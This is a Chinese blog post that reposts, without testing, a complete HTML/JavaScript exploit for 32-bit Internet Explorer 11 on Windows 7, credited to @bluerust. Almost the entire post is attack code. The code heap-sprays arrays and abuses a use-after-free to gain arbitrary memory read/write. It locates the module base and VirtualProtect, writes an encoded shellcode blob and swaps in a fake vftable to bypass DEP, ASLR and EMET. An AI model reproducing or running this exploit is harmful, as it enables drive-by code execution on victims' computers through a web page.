注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

且行且记录

点滴记录,行的更远!

 
 
 

日志

 
 

【收集】一个IE11的shellcode  

2014-10-29 16:33:30|  分类: 搜集 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

我没有IE11的环境,现在只有XP的IE8,没法测试。

<html>
<script>
/*
 * hacking ie 11: write once, bypass dep/emet without ROP Demo1
 * Author: @bluerust
 * Date  : 2014-03-13
 * Ver   : 1.3
 * Desc  :
 *      a. UAF -> modify data at arbitrarily address
 *      b. bypass DEP, ASLR, EMET without ROP
 * Tested on: x86 + Win7 + 32-bit ie 11 + EMET 5.0.5168.17251   
 * All honour belongs to Ivan Fratric.
 * References:
 *  [1] Exploiting Internet Explorer 11 64-bit on Windows 8.1 Preview
 *  http://ifsec.blogspot.jp/2013/11/exploiting-internet-explorer-11-64-bit.html
 * 
 *  !address -f:MEM_COMMIT,MEM_PRIVATE,PAGE_READWRITE,VAR
 *  dd 0x18aa0000
 *
 */
var guessarrayaddr   = 0x18aa0000>>>0;
var objectsize       = 0x140;
var bufferCapacity   = 0x40;
var spraysize        = 300;  /* mb */

 

var arraybase        = (guessarrayaddr + objectsize)>>>0;


var shellcodeaddr    = guessarrayaddr + 0x1000;
var fakestructaddr   = guessarrayaddr + 0x2000;
var fakevftableaddr  = guessarrayaddr + 0x3000;
var args             = guessarrayaddr + 0x4000;
var arr              = new Array();
var numofelement     = spraysize * 1024 * 1024 / objectsize  + 1;
var numofelement1    = numofelement - 1;
var index            = 0;
var vftable          = 0;
var readwriteaddr;
var modulebase       = 0>>>0;

for (var i = 0; i < numofelement; i++ )
{
   arr[i] = [ 0x44444444, 0x44444444, 0x44444444, 0x44444444, /* size: 0x140 */
              0x44444444, 0x44444444, 0x44444444, 0x44444444,
              0x44444444, 0x44444444, 0x44444444, 0x44444444,
              0x44444444, 0x44444444, 0x44444444, 0x44444444,
              0x44444444, 0x44444444, 0x44444444, 0x44444444,
             
              0x44444444, 0x44444444, 0x44444444, 0x44444444,
              0x44444444, 0x44444444, 0x44444444, 0x44444444,
              0x44444444, 0x44444444, 0x44444444, 0x44444444,
              0x44444444, 0x44444444, 0x44444444, 0x44444444,
              0x44444444, 0x44444444, 0x44444444, 0x44444444,
             
              0x44444444, 0x44444444, 0x44444444, 0x44444444,
              0x44444444, 0x44444444, 0x44444444, 0x44444444,
              0x44444444, 0x44444444, 0x44444444, 0x44444444,
              0x44444444, 0x44444444, 0x44444444, 0x44444444,
              0x44444444, 0x44444444, 0x44444444, 0x44444444,
              0x44444444, 0x44444444, 0x44444444, 0x44444444
            ];

    //arr[i].length = 0x18aa0038;
}

alert( "Please attach windbg, and then \"ed 18aa0030 80\"" );

function VaToIndex( offset )
{
    if (offset >= arraybase + 0x38)
    {
        return (offset - arraybase - 0x38)>>>0x02;
    }
    else
    {
        return (0x100000000 - (arraybase + 0x38 - offset))>>>0x02;
    }
}


function IndexToVa( index )
{
    if ( index >= ( (0x100000000 - (arraybase + 0x38))>>>0x02 ) )
    {
        return (arraybase + 0x38 ) - (0x100000000 - (index<<0x02));
    }
    else
    {
        return (index << 0x02)+0x38 + arraybase ;
    }
}


function GetDwordAtOffset( offset )
{
     return readwriteaddr[VaToIndex(offset)]>>>0;
}


function SetDwordAtOffset( offset, value )
{
    if ( ((value>>>0)&0xFFFFFFFF) >= 0x80000000 )
    {
        value = -(0x100000000 - ((value>>>0)&0xFFFFFFFF));
    }


    readwriteaddr[VaToIndex(offset)]  = value;
}


function GetLowWord( offset )
{
    return readwriteaddr[VaToIndex(offset)] & 0x0000FFFF;
}


function SearchModuleBase( vftable )
{
    var  addr = (vftable & 0xFFFFF000)>>>0;
   
    while ( GetLowWord( addr ) != 0x5a4d || GetLowWord( addr + 0xf8 ) != 0x4550 )
    {
        addr -= 0x1000;
    }


    return addr;
}


for (var i = numofelement1 - 1; i >= 0; i-- )
{
   arr[i][bufferCapacity+2+0x10/4] = 0x7fffffff; /* length */
   if ( arr[i+1].length == 0x7fffffff ) /* typeof( arr[]) != "" */
   {
        index                 = i;
        readwriteaddr         = arr[index+1];
        vftable               = arr[index][bufferCapacity + 0x02];
        //alert( vftable.toString( 0x10 ) );
        arr[i][bufferCapacity+2+0x2c/4] = 0x7fffffff;
        arr[i][bufferCapacity+2+0x30/4] = 0x7fffffff;
        arr[i][bufferCapacity+2+0x34/4] = 0x0;
        arr[i][bufferCapacity+2+0x18/4] = arr[i][bufferCapacity+2+0x14/4];

        modulebase             = SearchModuleBase( vftable  );
        i                      = VaToIndex(shellcodeaddr);
        //alert( modulebase.toString(0x10) );
        readwriteaddr[i++] = 0x24748b60;
        readwriteaddr[i++] = 0x20c68124;
        readwriteaddr[i++] = 0x42000000;
        readwriteaddr[i++] = 0x0004fe8b;
        readwriteaddr[i++] = 0x000145b9;
        readwriteaddr[i++] = 0x4434ac00;
        readwriteaddr[i++] = 0x002446aa;
        readwriteaddr[i++] = 0x0024f7e2;
        readwriteaddr[i++] = 0x003000cf;
        readwriteaddr[i++] = 0x00600060;
        readwriteaddr[i++] = 0x008200c5;
        readwriteaddr[i++] = 0x00740044;
        readwriteaddr[i++] = 0x00440044;
        readwriteaddr[i++] = 0x00cf0011;
        readwriteaddr[i++] = 0x00c500a8;
        readwriteaddr[i++] = 0x004400a8;
        readwriteaddr[i++] = 0x00440045;
        readwriteaddr[i++] = 0x00e90044;
        readwriteaddr[i++] = 0x00ac0014;
        readwriteaddr[i++] = 0x00440082;
        readwriteaddr[i++] = 0x00440044;
        readwriteaddr[i++] = 0x00ac0014;
        readwriteaddr[i++] = 0x00440016;
        readwriteaddr[i++] = 0x00440044;
        readwriteaddr[i++] = 0x009c00cf;
        readwriteaddr[i++] = 0x00f900c9;
        readwriteaddr[i++] = 0x00bb0044;
        readwriteaddr[i++] = 0x00bb00bb;
        readwriteaddr[i++] = 0x00840077;
        readwriteaddr[i++] = 0x000400fd;
        readwriteaddr[i++] = 0x00440044;
        readwriteaddr[i++] = 0x00b70044;
        readwriteaddr[i++] = 0x00c900ef;
        readwriteaddr[i++] = 0x004400f9;
        readwriteaddr[i++] = 0x00bb00bb;
        readwriteaddr[i++] = 0x001300bb;
        readwriteaddr[i++] = 0x008300c7;
        readwriteaddr[i++] = 0x00830054;
        readwriteaddr[i++] = 0x00000043;
        readwriteaddr[i++] = 0x00440044;
        readwriteaddr[i++] = 0x00130044;
        readwriteaddr[i++] = 0x00840077;
        readwriteaddr[i++] = 0x00140014;
        readwriteaddr[i++] = 0x00140014;
        readwriteaddr[i++] = 0x00140014;
        readwriteaddr[i++] = 0x004d00ac;
        readwriteaddr[i++] = 0x00440044;
        readwriteaddr[i++] = 0x00270044;
        readwriteaddr[i++] = 0x00280025;
        readwriteaddr[i++] = 0x006a0027;
        readwriteaddr[i++] = 0x003c0021;
        readwriteaddr[i++] = 0x00440021;
        readwriteaddr[i++] = 0x00bb0014;
        readwriteaddr[i++] = 0x00d40097;
        readwriteaddr[i++] = 0x00d400d4;
        readwriteaddr[i++] = 0x00d400d4;
        readwriteaddr[i++] = 0x00d400d4;
        readwriteaddr[i++] = 0x00d400d4;
        readwriteaddr[i++] = 0x00d400d4;
        readwriteaddr[i++] = 0x00d400d4;
        readwriteaddr[i++] = 0x00d400d4;
        readwriteaddr[i++] = 0x00cf00d4;
        readwriteaddr[i++] = 0x001900a1;
        readwriteaddr[i++] = 0x00860025;
        readwriteaddr[i++] = 0x00440040;
        readwriteaddr[i++] = 0x00cf0011;
        readwriteaddr[i++] = 0x00cf00a8;
        readwriteaddr[i++] = 0x004c0019;
        readwriteaddr[i++] = 0x00b700cf;
        readwriteaddr[i++] = 0x00370047;
        readwriteaddr[i++] = 0x00cf0078;
        readwriteaddr[i++] = 0x00c400fa;
        readwriteaddr[i++] = 0x00440044;
        readwriteaddr[i++] = 0x00470044;
        readwriteaddr[i++] = 0x00af00bf;
        readwriteaddr[i++] = 0x00cf000e;
        readwriteaddr[i++] = 0x00470043;
        readwriteaddr[i++] = 0x00af0087;
        readwriteaddr[i++] = 0x00b30078;
        readwriteaddr[i++] = 0x00440044;
        readwriteaddr[i++] = 0x00440044;
        readwriteaddr[i++] = 0x003100c4;
        readwriteaddr[i++] = 0x00cf0075;
        readwriteaddr[i++] = 0x0047004c;
        readwriteaddr[i++] = 0x00c5008f;
        readwriteaddr[i++] = 0x0046003d;
        readwriteaddr[i++] = 0x00360007;
        readwriteaddr[i++] = 0x00250021;
        readwriteaddr[i++] = 0x00600031;
        readwriteaddr[i++] = 0x003d00c5;
        readwriteaddr[i++] = 0x00300042;
        readwriteaddr[i++] = 0x00140021;
        readwriteaddr[i++] = 0x00310036;
        readwriteaddr[i++] = 0x00c5005f;
        readwriteaddr[i++] = 0x004e003d;
        readwriteaddr[i++] = 0x0027002b;
        readwriteaddr[i++] = 0x00370021;
        readwriteaddr[i++] = 0x00560031;
        readwriteaddr[i++] = 0x003d00c5;
        readwriteaddr[i++] = 0x0037004a;
        readwriteaddr[i++] = 0x00440005;
        readwriteaddr[i++] = 0x00310044;
        readwriteaddr[i++] = 0x006f004d;
        readwriteaddr[i++] = 0x00470043;
        readwriteaddr[i++] = 0x00540003;
        readwriteaddr[i++] = 0x004400cf;
        readwriteaddr[i++] = 0x005200af;
        readwriteaddr[i++] = 0x008400c7;
        readwriteaddr[i++] = 0x00c70040;
        readwriteaddr[i++] = 0x0044007c;
        readwriteaddr[i++] = 0x00fb0031;
        readwriteaddr[i++] = 0x008300c7;
        readwriteaddr[i++] = 0x00c70050;
        readwriteaddr[i++] = 0x0054003b;
        readwriteaddr[i++] = 0x00310044;
        readwriteaddr[i++] = 0x00c700f4;
        readwriteaddr[i++] = 0x0044007b;
        readwriteaddr[i++] = 0x00ef0031;
        readwriteaddr[i++] = 0x0086008d;
        readwriteaddr[i++] = 0x00440040;
        readwriteaddr[i++] = 0x00cf0011;
        readwriteaddr[i++] = 0x00cf00a8;
        readwriteaddr[i++] = 0x004c0019;
        readwriteaddr[i++] = 0x00b700cf;
        readwriteaddr[i++] = 0x00370047;
        readwriteaddr[i++] = 0x00cf0078;
        readwriteaddr[i++] = 0x00c400fa;
        readwriteaddr[i++] = 0x00440044;
        readwriteaddr[i++] = 0x00470044;
        readwriteaddr[i++] = 0x00af00bf;
        readwriteaddr[i++] = 0x00cf005e;
        readwriteaddr[i++] = 0x0048000b;
        readwriteaddr[i++] = 0x008f0047;
        readwriteaddr[i++] = 0x004600cf;
        readwriteaddr[i++] = 0x007d00c5;
        readwriteaddr[i++] = 0x00370029;
        readwriteaddr[i++] = 0x00270032;
        readwriteaddr[i++] = 0x004f0031;
        readwriteaddr[i++] = 0x003d00c5;
        readwriteaddr[i++] = 0x00360040;
        readwriteaddr[i++] = 0x006a0030;
        readwriteaddr[i++] = 0x00310020;
        readwriteaddr[i++] = 0x00af0046;
        readwriteaddr[i++] = 0x00c70048;
        readwriteaddr[i++] = 0x0054003b;
        readwriteaddr[i++] = 0x00310044;
        readwriteaddr[i++] = 0x00c700a4;
        readwriteaddr[i++] = 0x0048003b;
        readwriteaddr[i++] = 0x00310044;
        readwriteaddr[i++] = 0x00cf009e;
        readwriteaddr[i++] = 0x00540003;
        readwriteaddr[i++] = 0x00870047;
        readwriteaddr[i++] = 0x004400cf;
        readwriteaddr[i++] = 0x00440061;
        readwriteaddr[i++] = 0x00bb00b4;
        readwriteaddr[i++] = 0x002200bb;
        readwriteaddr[i++] = 0x007c00c5;
        readwriteaddr[i++] = 0x001e0009;
        readwriteaddr[i++] = 0x00480031;
        readwriteaddr[i++] = 0x000c00cf;
        readwriteaddr[i++] = 0x00470078;
        readwriteaddr[i++] = 0x0022008c;
        readwriteaddr[i++] = 0x007d00c5;
        readwriteaddr[i++] = 0x00010014;
        readwriteaddr[i++] = 0x00430030;
        readwriteaddr[i++] = 0x00440069;
        readwriteaddr[i++] = 0x00440054;
        readwriteaddr[i++] = 0x00af0044;
        readwriteaddr[i++] = 0x008d00a2;
        readwriteaddr[i++] = 0x00400086;
        readwriteaddr[i++] = 0x00000044;

        var j = VaToIndex(fakevftableaddr);
        var k = VaToIndex(vftable);
        for ( i = 0; i < 0x6a; i++ )
        {
            readwriteaddr[j++] = readwriteaddr[k++];
        }
       
        var virtualprotect                               = SearchFunc( modulebase +0x1000 );
        readwriteaddr[VaToIndex(fakevftableaddr + 0x7C)] = virtualprotect;
        arr[index][bufferCapacity+2]                     = fakevftableaddr;
        readwriteaddr[VaToIndex(fakestructaddr)]         = 0x0000;
        readwriteaddr[VaToIndex(fakestructaddr + 0x0c)]  = shellcodeaddr;
        if ( fakestructaddr in readwriteaddr )
        {
            readwriteaddr[VaToIndex(fakevftableaddr + 0x7C)] = shellcodeaddr;
            readwriteaddr[VaToIndex(args)]                   = modulebase;
            if ( shellcodeaddr in readwriteaddr )
            {
                window.location = "http://www.baidu.com";
            }
        }
        break;
   }
}


function SearchFunc( base )
{
    var index = VaToIndex( base );
    var n, n1, n2, n3, n4, n5;
    while ( 1 )
    {
        n = readwriteaddr[index] >>> 0;
        n1 = readwriteaddr[index + 1] >>> 0;
        n2 = readwriteaddr[index + 2] >>> 0;
        n3 = readwriteaddr[index + 3] >>> 0;
        n4 = readwriteaddr[index + 4] >>> 0;
        n5 = readwriteaddr[index + 5] >>> 0;
       
        // 硬搜索,经测试,多个小版本的ie 11都成功
        if (    n  == 0x8b55ff8b &&  
                n1 == 0x758b56ec &&  
                n2 == 0x017e8008 &&  
                n3 == 0x80297500 &&  
                n4 == 0x2475003e &&
                n5 == 0x00086583
           )
        {
            return IndexToVa( index );
        }
       
        if (     n == 0xec8b55ff &&  
                n1 == 0x08758b56 &&  
                n2 == 0x00017e80 &&  
                n3 == 0x3e802975 &&  
                n4 == 0x83247500 &&
                n5 == 0x8d000865
            )
        {
            return IndexToVa( index ) + 1;
        }
       
        if (     n == 0x56ec8b55 &&  
                n1 == 0x8008758b &&  
                n2 == 0x7500017e &&  
                n3 == 0x003e8029 &&  
                n4 == 0x65832475 &&
                n5 == 0x458d0008
            )
        {
            return IndexToVa( index ) + 2;
        } 
       
        if ( n == 0x8b56ec8b &&  
            n1 == 0x7e800875 &&  
            n2 == 0x29750001 &&  
            n3 == 0x75003e80 &&  
            n4 == 0x08658324 &&
            n5 == 0x08458d00
            )
        {
            return IndexToVa( index ) + 3;
        } 
       
        index++;
    }
   
    return 0>>>0;
}
</script>
</html>

  评论这张
 
阅读(415)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017